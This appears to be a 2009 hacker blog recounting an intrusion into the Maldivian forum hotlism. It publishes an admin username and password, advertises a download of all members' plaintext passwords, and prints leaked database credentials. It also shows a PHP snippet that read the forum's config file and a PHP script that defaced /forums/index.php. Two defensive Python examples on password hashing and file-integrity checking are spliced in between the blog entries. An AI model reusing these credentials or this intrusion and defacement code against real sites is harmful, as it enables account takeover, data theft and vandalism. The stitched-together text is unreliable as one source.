Friday, February 20, 2009

ihackedhotlism ™ presents

I hacked hotlism doesn't mean it ends there. "Hacking" is my hobby and I really can't give it up. Today I give you, my friends, one of the admin accounts of the hotlism forum. How I did it, or when and where I did it, is all confidential information. Please don't try to retrieve them, and if you are the first to see this post, please don't reset the password!

UserName: mock
PassWord: zamnazaman

It was a hard job but in the end worthwhile and fun. Since I have done enough damage to hotlism already, I don't intend on doing any more myself right now. So enjoy, and don't tell mock that I stole his password.

>>> I am a skiddy. so never mind me or what i do <<<

Friday, February 6, 2009

Interesting finds in the database

DOWNLOAD ALL USERS AND THEIR PLAIN PASSWORDS HERE
I had a lot of respect for the cool people who ran hotlism until last night. I finally thought I would see what's in their database, and what I saw was shocking. The hotlism team seems to be spying on everybody's passwords :O. Passwords are stored as hashes in the database in most web applications, including IPB. This is to protect users from being exploited if the database ever got exposed, like in this situation. The Hotlism guys thought that if they knew what some guy was typing as a password for their forum, and if they got lucky, the same guy would have the same password for his hotmail account or some other account elsewhere. So they were storing plain text versions of the user passwords in their database (in the members_converge table, to be more precise).
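Added example, not part of the post: how a forum would store and check passwords so that a leaked database (the situation above) gives up only salted, slow hashes rather than the plaintext copy found in members_converge, plus a small audit that flags any exported row still carrying a plaintext column. It uses only Python's standard library; the member rows and the column name pass_plain are constructed for the example.

```python
# Added example (not from the post): salted PBKDF2 storage and a dump audit.
# The rows below are constructed sample data; "pass_plain" is an assumed
# column name standing in for the plaintext copy the post describes.
import hashlib
import hmac
import secrets

ITERATIONS = 600_000  # PBKDF2-HMAC-SHA256 work factor (assumed choice)


def make_record(username: str, password: str) -> dict:
    """Build a member row holding only a random salt and a slow hash.

    There is deliberately no column that could hold the password itself,
    so a dump of this table cannot be replayed against other sites.
    """
    salt = secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return {"username": username, "salt": salt.hex(), "hash": digest.hex()}


def verify(record: dict, candidate: str) -> bool:
    """Recompute the hash with the stored salt and compare in constant time."""
    digest = hashlib.pbkdf2_hmac(
        "sha256", candidate.encode(), bytes.fromhex(record["salt"]), ITERATIONS
    )
    return hmac.compare_digest(digest, bytes.fromhex(record["hash"]))


def audit_dump(rows: list, plain_column: str = "pass_plain") -> list:
    """Return usernames whose row still carries a non-empty plaintext password.

    Run this over a database export before anyone else does: an empty result
    is what a forum that only stores hashes should produce.
    """
    return [r["username"] for r in rows if r.get(plain_column)]


if __name__ == "__main__":
    rec = make_record("alice", "correct horse battery")
    print(verify(rec, "correct horse battery"), verify(rec, "wrong"))
    leaked = [rec, {"username": "bob", "pass_plain": "hunter2"}]
    print(audit_dump(leaked))  # only bob is exposed by the dump
```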

I immediately made a post on hotlism saying they did this, and before their users learnt this truth, they banned me and deleted my post.



Now when I think of this, I should have logged in as each user and deleted all their posts or done all sorts of funky stuff. Last night they changed all the users' passwords to some unknown value and are asking users to either reset it or ask an admin to reset it for them. I wonder if I can make an account voodoo@live.com and get this account now? This is all bullshit.

People of hotlism, you broke the whole chain of trust between your users and the team when you decided to store their passwords in plain text versions so you could view them and use them for your personal gains. I hope you do say sorry, and this is one of those situations where sorry really isn't enough.

A list of all users and their passwords can be downloaded from over here. They are stored in the form id : username : password.

how we hacked hotlism


Maldivian forums were all about hacking and being hacked to prove each other's superiority. Hotlism was one of the remaining virgins on the market who was yet to be raped. Since it was to happen and somebody was going to take the initiative, I thought why not me? Running a background check on Hotlism revealed that it had lots of security-aware people on its team. This made everything tough and made it look impossible. So I formed a 50/50 partnership with ProxyGod.

We neither have nor had anything against Hotlism except for them and their users boasting too much about them not being hacked and being "UNHACKABLE". After a few days of looking around, ProxyGod managed to break into one of the blogs hosted on hotlism (rezorn.hotlism.org). Anyways, he broke in and immediately passed the info on to me.

Primarily I uploaded a shell to their server. But guess what? It didn't work. They seemed to be using .htaccess files to cut off calls to files that look like shells. Here is what I got.



Then I gave up on that shell and wrote a file on their server with the following contents.
<?php
echo file_get_contents('/forums/conf_global.php');
?>

and woodaa. I got a plain text version of their database details which were:
<?php
$INFO['use_eaccelerator'] = 1;
$INFO['sql_driver'] = 'mysql';
$INFO['sql_host'] = 'localhost';
$INFO['sql_database'] = 'vpshotli_hotlism';
$INFO['sql_user'] = 'vpshotli_fuck';
$INFO['sql_pass'] = 'fuckfest';
$INFO['sql_tbl_prefix'] = 'ibf_';
$INFO['sql_debug'] = '1';
$INFO['board_start'] = '1213218696';
$INFO['installed'] = '1';
$INFO['php_ext'] = 'php';
$INFO['safe_mode'] = '0';
$INFO['board_url'] = 'http://hotlism.org/forums';
$INFO['banned_group'] = '5';
$INFO['admin_group'] = '4';
$INFO['guest_group'] = '2';
$INFO['member_group'] = '3';
$INFO['auth_group'] = '1';
$INFO['mysql_tbl_type'] = 'MyISAM';
?>

With that, I immediately dumped their database and downloaded it (thinking it might come in handy later). After that I simply wrote a new file to their server with the following contents and ran it.


<?php
$defaced = <<<html
<html> <head> <title>Hacked</title> </head> <body style='text-align: center;'> <p>&nbsp;</p> <h2>= OOOpS! HACKED =</h2> Proxy God - ChronO<br/>= * = * = * = * = * =<br/> People were starting to make all sorts of craxy assumptions about<br/> hotlism that something like this just had to happen. Next time just<br/> dont pucking go about thinking you are perfect.<br/><br/> Anonymity is freedom<br/> We hope it doesnt hurt too bad. </body> </html>
html;
file_put_contents('/forums/index.php', $defaced);
?>

That easily defaced them. Now all that was left was to include a shoutbox to see who was in on the fun, but we did it a little late it seems. The Hotlism guys somehow managed to suspend their own account - everything was gone, including the virginity of hotlism. And that was the story of how me and ProxyGod hacked hotlism.
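Added example, not part of the post: a baseline-and-compare integrity check over a web root, which is the control that would have surfaced the new PHP files written to the server and the overwritten /forums/index.php in the story above, instead of relying on .htaccess rules that match shell-looking filenames. The web root, its file contents and the path blog/read_conf.php are constructed inside a temporary directory so the script runs offline.

```python
# Added example (not from the post): a baseline-and-compare integrity check
# over a web root, the control that would have surfaced the extra PHP files
# written to the server and the overwritten /forums/index.php in the story
# above. demo() replays those events against a constructed web root.
import hashlib
import os
import tempfile


def snapshot(root: str) -> dict:
    """Map every file under root (forward-slash relative path) to its SHA-256."""
    out = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            out[os.path.relpath(full, root).replace(os.sep, "/")] = digest
    return out


def diff(baseline: dict, current: dict) -> tuple:
    """Return (added, modified, removed) paths between two snapshots."""
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    modified = sorted(p for p in baseline
                      if p in current and baseline[p] != current[p])
    return added, modified, removed


def write(path: str, text: str) -> None:
    """Create parent directories and write text (helper for the demo)."""
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as fh:
        fh.write(text)


def demo() -> tuple:
    """Replay the post's two file events against a constructed web root."""
    with tempfile.TemporaryDirectory() as root:
        write(os.path.join(root, "forums", "index.php"), "<?php echo 'forum';")
        write(os.path.join(root, "forums", "conf_global.php"), "<?php // cfg")
        baseline = snapshot(root)  # taken at deploy time, kept off the host
        write(os.path.join(root, "forums", "index.php"), "<?php echo 'owned';")
        write(os.path.join(root, "blog", "read_conf.php"), "<?php // dropped")
        return diff(baseline, snapshot(root))

if __name__ == "__main__":
    print(demo())  # (['blog/read_conf.php'], ['forums/index.php'], [])
```

The baseline has to live somewhere the web server cannot write, or an attacker with the file-write access described above simply refreshes it.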